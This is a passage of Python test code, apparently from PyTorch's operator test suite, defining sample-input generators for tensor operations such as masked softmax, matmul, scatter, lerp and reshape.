with_dtype=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = [ ((S, ), (0, )), ((S, S), (0, )), ((S, S), (1, )), ((S, S), (-1, )), ((S, M, S), (2, )), ] # PyTorch on XLA throws an error when passed with dim argument for 0d tensor. # See https://github.com/pytorch/xla/issues/3061 for more details. if torch.device(device).type != 'xla': cases.append(((), (0, ))) return [ SampleInput(make_arg(shape), args=dim, kwargs=dict(dtype=torch.float64) if with_dtype else None) for shape, dim in cases ] def sample_inputs_masked_softmax(op_info, device, dtype, requires_grad, with_dtype=False, **kwargs): """Sample inputs for masked softmax, log_softmax, and softmin. Masked normalization operator is a reduction operator with trailing mask optional argument. A mask is a bool tensor with the same shape as input or a shape that is broadcastable to input shape. """ inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, with_dtype=with_dtype, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_cumops(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked cumsum and cumprod. """ inputs: List[SampleInput] = [] for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): for mask in _generate_masked_op_mask(sample_input.input.shape, device, **kwargs): if type(mask) != torch.Tensor: continue sample_input_args, sample_input_kwargs = sample_input.args, dict(mask=mask, **sample_input.kwargs) if 'keepdim' in sample_input_kwargs: sample_input_kwargs.pop('keepdim') # dimension is required if sample_input_args: dim = sample_input.args[0] else: if 'dim' not in sample_input_kwargs: continue dim = sample_input_kwargs.pop('dim') sample_input_args = (dim,) inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_masked_normalize(op_info, device, dtype, requires_grad, **kwargs): """Sample inputs for masked normalize. """ inputs: List[SampleInput] = [] for ord in [2.0, 1, float('inf'), float('-inf'), 0]: for sample_input in sample_inputs_softmax_variant(op_info, device, dtype, requires_grad, **kwargs): sample_input_args, sample_input_kwargs = (ord,) + sample_input.args, sample_input.kwargs.copy() inputs.append(SampleInput(sample_input.input.clone().requires_grad_(requires_grad), args=sample_input_args, kwargs=sample_input_kwargs)) return inputs def sample_inputs_logit(op_info, device, dtype, requires_grad, **kwargs): low, high = op_info.domain # Note: Operator is very sensitive at points near the # start and end of domain and leads to NaN for float16 # if domain_eps is 1e-5. domain_eps = op_info._domain_eps if dtype != torch.float16 else 3e-2 low = low + domain_eps high = high - domain_eps samples = ( SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad), args=(0.2,)), ) return samples def sample_inputs_isin(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # isin has two paths based on the size of elements and test_elements. # if elements.numel() < 10 * pow(test_elements.numel(), 0.145): yield SampleInput(make_arg((L,)), args=(make_arg((S,)),)) # else: yield SampleInput(make_arg((S,)), args=(make_arg((L,)),)) def sample_inputs_masked_scatter(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(torch.randn((S,), device=device) > 0, make_arg((S, S)))) yield SampleInput(make_arg((S, S)), args=(bernoulli_scalar().to(device), make_arg((S, S)))) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg((S, S))), broadcasts_input=True) def sample_inputs_masked_fill(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, 10)) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, S, device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn(S, device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg(()), args=(torch.randn((), device=device) > 0, make_arg(()))) yield SampleInput(make_arg((S, S)), args=(torch.randn((), device=device) > 0, 10)) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, make_arg(())), broadcasts_input=True) yield SampleInput(make_arg((S,)), args=(torch.randn(S, S, device=device) > 0, 10), broadcasts_input=True) def sample_inputs_masked_select(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn(M, M, device=device) > 0,)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M,), device=device) > 0,)), SampleInput(make_tensor((M,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((M, 1, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((M, M), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.tensor(1, device=device, dtype=torch.bool),)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(torch.randn((M, M), device=device) > 0,)), ) return samples def sample_inputs_matrix_exp(op_info, device, dtype, requires_grad, **kwargs): samples = ( SampleInput(make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad)), SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, requires_grad=requires_grad)), ) return samples def sample_inputs_matmul(op_info, device, dtype, requires_grad, **kwargs): test_cases = (((L,), (L,)), ((S, M), (M,)), ((M,), (M, S)), ((S, M), (M, S)), ((S, 0), (0, M)), ((S, S, M), (M,)), ((S, S, M), (M, S)), ((S, S, 0), (0, S)), ((M,), (S, M, S)), ((S, M), (S, M, S)), ((0, 0), (S, 0, 0)), ((S, S, M, M), (S, S, M, S)), ((S, S, M, M), (M,)), ((M,), (S, S, M, S))) sample_inputs = [] for lhs_shape, rhs_shape in test_cases: lhs = make_tensor(lhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) rhs = make_tensor(rhs_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) if op_info.name == 'matmul': sample_inputs.append(SampleInput(lhs, args=(rhs,))) elif op_info.name == '__rmatmul__': sample_inputs.append(SampleInput(rhs, args=(lhs,))) else: raise RuntimeError("`op_info.name` must be 'matmul' or '__rmatmul__'") return tuple(sample_inputs) def sample_inputs_meshgrid(op_info: OpInfo, device: torch.device, dtype: torch.dtype, requires_grad: bool, *, variant: str, **kwargs) -> List[SampleInput]: if variant == 'variadic': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors[0], tuple(tensors[1:]) elif variant == 'list': def make_inputs( tensors: List[torch.Tensor]) -> Tuple[Union[torch.Tensor, List[torch.Tensor]], Tuple[torch.Tensor, ...]]: return tensors, () else: raise ValueError( 'Unsupported variant, must be one of {"variadic", "list"}. ' f'Got "{variant}".') SCALAR = torch.Size([]) VECTOR = torch.Size([3]) test_cases: List[List[torch.Size]] = [ [SCALAR], [VECTOR], [VECTOR, SCALAR], [VECTOR, SCALAR, VECTOR], [VECTOR, SCALAR, VECTOR, SCALAR], ] sample_inputs = [] for shapes, indexing in itertools.product(test_cases, {'xy', 'ij'}): input, args = make_inputs( [make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes]) sample_inputs.append(SampleInput(input=input, args=args, kwargs=dict(indexing=indexing))) return sample_inputs def sample_inputs_polygamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) for shape, n in product(tensor_shapes, ns): yield SampleInput(make_arg(shape), args=(n,)) def sample_inputs_mvlgamma(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) tensor_shapes = ((S, S), ()) ns = (1, 2, 3, 4, 5) # Since the accepted lower bound for input # to mvlgamma depends on `p` argument, # the following function computes the lower bound # which we pass to `make_tensor`. def compute_min_val(p): return (p - 1.) / 2 for shape, n in product(tensor_shapes, ns): min_val = compute_min_val(n) if not dtype.is_floating_point: # Round-up minimum value for integral dtypes min_val += 1 else: min_val += 2 * torch.finfo(dtype).eps yield SampleInput(make_arg(shape, low=min_val), args=(n,)) # Since `mvlgamma` has multiple entries, # there are multiple common skips for the additional # entries. Following function is a helper to that end. def skips_mvlgamma(skip_redundant=False): skips = ( # outside domain values are hard error for mvlgamma op. DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_float_domains'), ) if skip_redundant: # Redundant tests skips = skips + ( # type: ignore[assignment] DecorateInfo(unittest.skip("Skipped!"), 'TestGradients'), DecorateInfo(unittest.skip("Skipped!"), 'TestJit'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon'), ) return skips # To test reference numerics against multiple values of argument `p`, # we make multiple OpInfo entries with each entry corresponding to different value of p. # We run the op tests from test_ops.py only for `p=1` to avoid redundancy in testing. # Class `MvlGammaInfo` already contains the basic information related to the operator, # it only takes arguments like `domain`, `skips` and `sample_kwargs`, which # differ between the entries. class MvlGammaInfo(UnaryUfuncInfo): def __init__(self, variant_test_name, domain, skips, sample_kwargs): super(MvlGammaInfo, self).__init__( 'mvlgamma', ref=reference_mvlgamma if TEST_SCIPY else _NOTHING, aliases=('special.multigammaln',), variant_test_name=variant_test_name, domain=domain, decorators=(precisionOverride({torch.float16: 5e-2}),), dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half), sample_inputs_func=sample_inputs_mvlgamma, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=skips, sample_kwargs=sample_kwargs) def sample_inputs_entr(op_info, device, dtype, requires_grad, **kwargs): low, _ = op_info.domain if requires_grad: low = 0 + op_info._domain_eps return (SampleInput(make_tensor((L,), dtype=dtype, device=device, low=low, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=low, requires_grad=requires_grad))) # TODO: Consolidate `i0e` with sample_inputs_unary when `make_tensor`, # supports `exclude` argument. # For more context: https://github.com/pytorch/pytorch/pull/56352#discussion_r633277617 def sample_inputs_i0_i1(op_info, device, dtype, requires_grad, **kwargs): samples = (SampleInput(make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad))) if requires_grad and op_info.op == torch.special.i0e: # NOTE: `i0e`'s first-order gradient is not continous # at `0`, hence we don't test `i0e` with any input being `0`. # TODO: Remove this when `make_tensor` supports excluding `0`. for sample in samples: t = sample.input t[t == 0] = torch.finfo(dtype).eps # type: ignore[index] elif requires_grad and op_info.op != torch.special.i0e: # Special Case for gradient # Sample with `0` in the input t = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad) t[0] = 0 samples += (SampleInput(t),) # type: ignore[assignment] return samples def sample_inputs_cumulative_ops(op_info, device, dtype, requires_grad, supports_dtype_kwargs=True, **kwargs): def _make_tensor_helper(shape, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) samples = [ SampleInput(_make_tensor_helper((S, S, S)), args=(0,)), SampleInput(_make_tensor_helper((S, S, S)), args=(1,)), SampleInput(_make_tensor_helper(()), args=(0,)), ] if supports_dtype_kwargs: # NOTE: if `dtype` is not same as input, then inplace variants fail with # `provided dtype must match the dtype of self tensor in cumsum` samples.append(SampleInput(_make_tensor_helper((S, S, S)), args=(1,), kwargs={'dtype': dtype})) return samples def sample_inputs_unfold(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((), (0, 1, 1)), ((S, S, S, S), (0, 3, 1)), ((S, S, S, S), (1, 3, 1)), ((S, S, S, S), (2, 3, 1)), ((S, S, S, S), (3, 3, 1)), ((S, S, S, S), (0, 3, 2)), ((S, S, S, S), (1, 3, 2)), ((S, S, S, S), (2, 3, 2)), ((S, S, S, S), (3, 3, 2)), ((S, S, S, S), (0, 4, 1)), ((S, S, S, S), (1, 4, 1)), ((S, S, S, S), (2, 4, 1)), ((S, S, S, S), (3, 4, 1)), ((M,), (0, 3, 1)), ((M,), (0, 3, 2)), ((M,), (0, 3, 3)), ((1000,), (0, 3, 11)), ((1000,), (0, 2, 27)), ((10, 10), (0, 1, 2)), ((10, 10), (1, 2, 3)), ((10, 10), (1, 2, 2)), ((S, S, S), (2, 3, 2)), ) sample_inputs = [] for shape, arguments in test_cases: sample_inputs += [SampleInput(make_tensor(shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=arguments)] return sample_inputs def sample_inputs_split(op_info, device, dtype, requires_grad, *, list_args=False, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) if list_args: cases = ( ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], 2),), ((S, S, S), ([int(S / 2), S - int(S / 2) * 2, int(S / 2)], -2),) ) else: cases = ( # type: ignore[assignment] ((S, S, S), (2,)), ((S, S, S), (S, 1)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_split_with_sizes(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = (((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)],)), ((S, S, S), ([int(S / 3), S - int(S / 3), 0],)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], 2)), ((S, S, S), ([int(S / 3), S - int(S / 3) * 2, int(S / 3)], -2)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_msort(op_info, device, dtype, requires_grad, **kwargs): def apply_grad(t): if dtype in floating_types_and(torch.float16, torch.bfloat16): t.requires_grad_(requires_grad) def large_1d_unique(dtype, device): res = torch.randperm(L * L * L, dtype=torch.int64, device=device) res = res.to(dtype) apply_grad(res) return res samples = [] # Test case for large tensor. largesample = SampleInput(large_1d_unique(dtype, device)) sample = SampleInput(make_tensor((S, M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)) return [largesample, sample] def sample_inputs_lerp(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = ( # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4)), # broadcast rhs with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S,)), make_arg((S, S)))), # broadcast rhs and weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, 1)), make_arg((S,)))), # broadcast lhs SampleInput(make_arg((S,)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # scalar broadcast_lhs SampleInput(make_arg(()), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), 0.4), broadcasts_input=True), # tensor broadcast all SampleInput(make_arg((S, 1)), args=(make_arg((S, S)), make_arg((S, 1))), broadcasts_input=True), # no broadcast with weight tensor SampleInput(make_arg((S, S)), args=(make_arg((S, S)), make_arg((S, S)))), # broadcast lhs with weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor SampleInput(make_arg((S,)), args=(make_arg((S, S, S)), make_arg((S, S))), broadcasts_input=True), # broadcast lhs and weight tensor variant SampleInput(make_arg((S, S)), args=(make_arg((S, S, S)), make_arg((S,))), broadcasts_input=True), ) if dtype.is_complex: samples = samples + ( # type: ignore[assignment] # no broadcast SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 1.2 + 0.1j)), # broadcast rhs SampleInput(make_arg((S, S)), args=(make_arg((S,)), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg((S, S)), 5.4 + 9j)), # scalar tensor SampleInput(make_arg(()), args=(make_arg(()), 0.4j)), SampleInput(make_arg(()), args=(make_arg(()), 6.1 + 0.004j)), # broadcast rhs scalar-tensor SampleInput(make_arg((S, S)), args=(make_arg(()), 0.4j)), SampleInput(make_arg((S, S)), args=(make_arg(()), 1 + 2j)), ) return samples def sample_inputs_tensordot(self, device, dtype, requires_grad, **kwargs): cases = ( ((2, 2, 2), (2, 2, 2), (2)), ((2, 2, 1), (2, 1, 2), ([0, 1], [2, 0])), ) samples = [] for first_shape, second_shape, dims in cases: samples.append(SampleInput(make_tensor(first_shape, dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor(second_shape, dtype=dtype, device=device, requires_grad=requires_grad),), kwargs=dict(dims=dims,))) return tuple(samples) def sample_inputs_kron(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((S, S), (M, L)), ) sample_inputs = [] for input_shape, other_shape in test_cases: input = make_tensor(input_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) other = make_tensor(other_shape, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad) sample = SampleInput(input, args=(other,)) sample_inputs.append(sample) return tuple(sample_inputs) def sample_inputs_inner(self, device, dtype, requires_grad, **kwargs): return ( SampleInput( make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, ), dtype=dtype, device=device, requires_grad=requires_grad), ) ), SampleInput( make_tensor((), dtype=dtype, device=device, requires_grad=requires_grad), args=( make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad), ) ), ) def sample_inputs_scatter(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), (_tensor(()), (0, zero.clone().detach(), 2.5)), ) samples = [] for tensor, args in test_cases: samples.append(SampleInput(tensor, args=args)) if not requires_grad: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'add'} )) if dtype.is_floating_point: samples.append(SampleInput( tensor.clone().detach(), args=args, kwargs={'reduce': 'multiply'} )) return samples def sample_inputs_scatter_add(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( (_tensor((M, S)), (0, _gather((S, S), 1, M), _tensor((S, S)))), (_tensor((M, S)), (1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (-1, _gather((S, S), 0, S), _tensor((S, S)))), (_tensor((M, S)), (0, _gather((M, S // 2), 1, M), _tensor((M, S // 2)))), (_tensor((M, S)), (1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor((M, S)), (-1, _gather((M, S // 2), 0, S), _tensor((M, S // 2)))), (_tensor(()), (0, zero.clone().detach(), _tensor(()))), ) return [SampleInput(tensor, args=args) for tensor, args in test_cases] def sample_inputs_scatter_reduce(op_info, device, dtype, requires_grad, **kwargs): def _tensor(shape, dtype=dtype, low=None, high=None): return make_tensor(shape, dtype=dtype, device=device, low=low, high=high, requires_grad=requires_grad) def _gather(shape, index_dim, max_indices): return gather_variable(shape, index_dim, max_indices, device=device) zero = torch.tensor(0, dtype=torch.long, device=device) test_cases = ( ((M, S), 0, _gather((S, S), 1, M), (S, S)), ((M, S), 1, _gather((S, S), 0, S), (S, S)), ((M, S), -1, _gather((S, S), 0, S), (S, S)), ((M, S), 0, _gather((M, S // 2), 1, M), (M, S // 2)), ((M, S), 1, _gather((M, S // 2), 0, S), (M, S // 2)), ((M, S), -1, _gather((M, S // 2), 0, S), (M, S // 2)), ((), 0, zero.clone().detach(), ()), ) reduce = op_info.variant_test_name for args, include_self in product(test_cases, [True, False]): inp_shape, dim, index, src_shape = args yield SampleInput(_tensor(inp_shape), args=(dim, index, _tensor(src_shape), reduce), kwargs={'include_self': include_self}) # Sample inputs to test edge cases for backward # Check that gradients are propagated correctly for prod when zeros in self/src are reduced if requires_grad and reduce == 'prod': # This sample tests gradients for the following cases # (a) 1 zero reduced (from src (self[0, 1], self[1, 1]), from self (self[0, 0], self[2, 0])) # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0]) # (c) no zeros reduced (self([2, 1])) # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py # test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad input = torch.tensor([[0, 13], [0, 17], [0, 19]], dtype=dtype, device=device, requires_grad=requires_grad) src = torch.tensor([[0, 1, 2, 3], [0, 4, 0, 1], [2, 3, 5, 6]], dtype=dtype, device=device, requires_grad=requires_grad) idx = torch.tensor([[1, 1, 0, 0], [0, 0, 1, 1], [0, 0, 0, 1]], dtype=torch.long, device=device) yield SampleInput(input, args=(1, idx, src, reduce), kwargs={'include_self': True}) def sample_inputs_ravel(op_info, device, dtype, requires_grad, **kwargs): samples = (SampleInput(make_tensor((S, S, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)), SampleInput(make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad)),) return samples def sample_inputs_tril_triu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = (((M, M), ()), ((M, M), (2,),), ((S, M, M), ()), ((S, M, M), (2,)), ((3, 3, S, S), ()),) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def sample_inputs_clone(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(make_arg((S, M, S))) yield SampleInput(make_arg(())) def reference_inputs_clone(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_clone(op, device, dtype, requires_grad, **kwargs) shapes = ( (3, 5, 6), (1, 1, 3, 5, 6), (1, 1, 3, 5, 6, 1, 1), (1, 0, 3, 5, 0, 2), (1, 0, 3, 5, 0, 0, 1, 1, 2), (), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape in shapes: yield SampleInput(make_arg(shape)) yield SampleInput(make_arg(shape).transpose(0, -1)) yield SampleInput(make_arg(shape, noncontiguous=True)) yield SampleInput(make_arg(shape, noncontiguous=True).transpose(0, -1)) # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) for shape, strides, offset in strided_cases: yield SampleInput(make_arg(500,).as_strided(shape, strides, offset)) def sample_inputs_contiguous(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) yield SampleInput(make_arg((S, S))) def sample_inputs_sum_to_size(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # list of tuples (shape, shape) defining the shapes of the input and output tensors sample_shapes = [ ((), ()), ((S), (1)), ((S, S), (1, 1)), ((S, S), (1, S)), ((S, S), (S, S)), ((S, S, S), (S, 1, S)), ] samples = [] for input_shape, output_shape in sample_shapes: input_t = make_arg(input_shape) samples.append(SampleInput(input_t, args=(output_shape,))) return samples def sample_inputs_resize_ops(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1, 1)), ) for shape, args_or_shape in cases: # Update `args` based on operator if op_info.name == 'resize_': # resize_ takes shape/tuple of ints, args = (args_or_shape, ) elif op_info.name == 'resize_as_': # resize_as_ takes another tensor args = (make_arg(shape, requires_grad=False), ) # type:ignore[assignment] else: raise ValueError("sample_inputs_resize_ops is being used with incorrect operator") yield(SampleInput(make_arg(shape, requires_grad=requires_grad), args=args)) def sample_inputs_view_reshape(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) cases = ( ((S, S, S), (S * S, S)), ((S * S, S), (S, S, S)), ((S * S, S), (S, -1, S)), ((S * S * 2, S), (S, -1)), ((S,), (S,)), ((), ()), ((), (1,)), ) for shape, args in cases: yield SampleInput(make_arg(shape), args=(args,)) if kwargs.get("transpose_samples", False) and len(shape) >= 2: transposed = make_arg(shape).transpose(0, 1).detach().requires_grad_(requires_grad) yield SampleInput(transposed, args=(args,)) def reference_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_view_reshape(op, device, dtype, requires_grad, **kwargs) cases = ( ((125,), (25, 5)), ((25, 25), (1, 5, 5, 1, 5, 1, 5, 1)), ((16, 32), (2, 4, 1, 4, 4, 1, 4)), ((16, 12), (12, 16)), ((1, 16, 12), (12, 16)), ((1, 5, 1, 5), (25, 1)), ((2, 4, 2), (4, 4)), ((1, 4), (1, 1, 2, 1, 2)), ((3, 5, 7), (7, 5, 3)), ((1,), ()), ((5, 0, 2, 3), (5, 0, 2, 3)), ((2, 1, 0, 3, 1), (5, 0)), ((1,), ()), ((4, 5, 6), (4, 5, 6, 1, 1, 1)), ((), (1, 1, 1, 1)), ) irreversible_cases = ( ((), (-1,)), ((4, 7, 9, 1, 1), (1, 4, 3, -1, 1)), ) make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for a, b in cases: yield SampleInput(make_arg(a), args=(b,)) yield SampleInput(make_arg(b), args=(a,)) if kwargs.get("transpose_samples", False): yield SampleInput(make_arg(a, noncontiguous=True).transpose(0, -1), args=(b,)) else: yield SampleInput(make_arg(a, noncontiguous=True), args=(b,)) for a, b in irreversible_cases: yield SampleInput(make_arg(a), args=(b,)) def error_inputs_reshape(op, device, **kwargs): cases = ( # Reshape to different numel ((2,), ()), ((1, 3, 0), ()), ((4, 3), (4, 2)), ((1, 3, 5), (5, 2, 2)), # No valid inference ((1, 3, 5), (5, -1, 2)), # Two inferred shapes ((1, 3, 5), (5, -1, -1)), ((1), (0, -1)), ((0, 5), (0, -1)), ) make_arg = partial(make_tensor, dtype=torch.float32, device=device, requires_grad=False) for a, b in cases: yield ErrorInput(SampleInput(make_arg(a), args=(b,)), error_type=Exception, error_regex="") def sample_inputs_view_as_reshape_as(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device) cases = (((S, S, S), (S * S, S)), ((), ()), ((), (1, 1)), ) for case in cases: shape, shape_other = case inp = make_arg(shape, requires_grad=requires_grad) yield(SampleInput(inp, args=(make_arg(shape_other, requires_grad=False),))) if op_info.name != "view_as" and len(shape) >= 2: yield(SampleInput( inp.clone().transpose(0, 1).requires_grad_(requires_grad), args=(make_arg(shape_other, requires_grad=False),))) def sample_inputs_atleast1d2d3d(op_info, device, dtype, requires_grad, **kwargs): input_list = [] shapes = ((S, S, S, S), (S, S, S), (S, S), (S, ), (),) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) samples = [] for shape in shapes: input_list.append(make_tensor_partial(shape)) samples.append(SampleInput(make_tensor_partial(shape))) samples.append(SampleInput(input_list, )) return samples def sample_inputs_column_stack(op_info, device, dtype, requires_grad, **kwargs): input_list = [] cases: Tuple[tuple, tuple] = ( # type: ignore[assignment] ((S, 2, 1), (S, 3, 1)), ((S), (S, 5)), ((), (1, S)) ) make_tensor_partial = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) for shape1, shape2 in cases: input_list.append(SampleInput([make_tensor_partial(shape1), make_tensor_partial(shape2)])) return input_list def sample_inputs_flatten(op_info, device, dtype, requires_grad, **kwargs): samples = [] shapes = ((S, S, S), (S, S), (S, ), 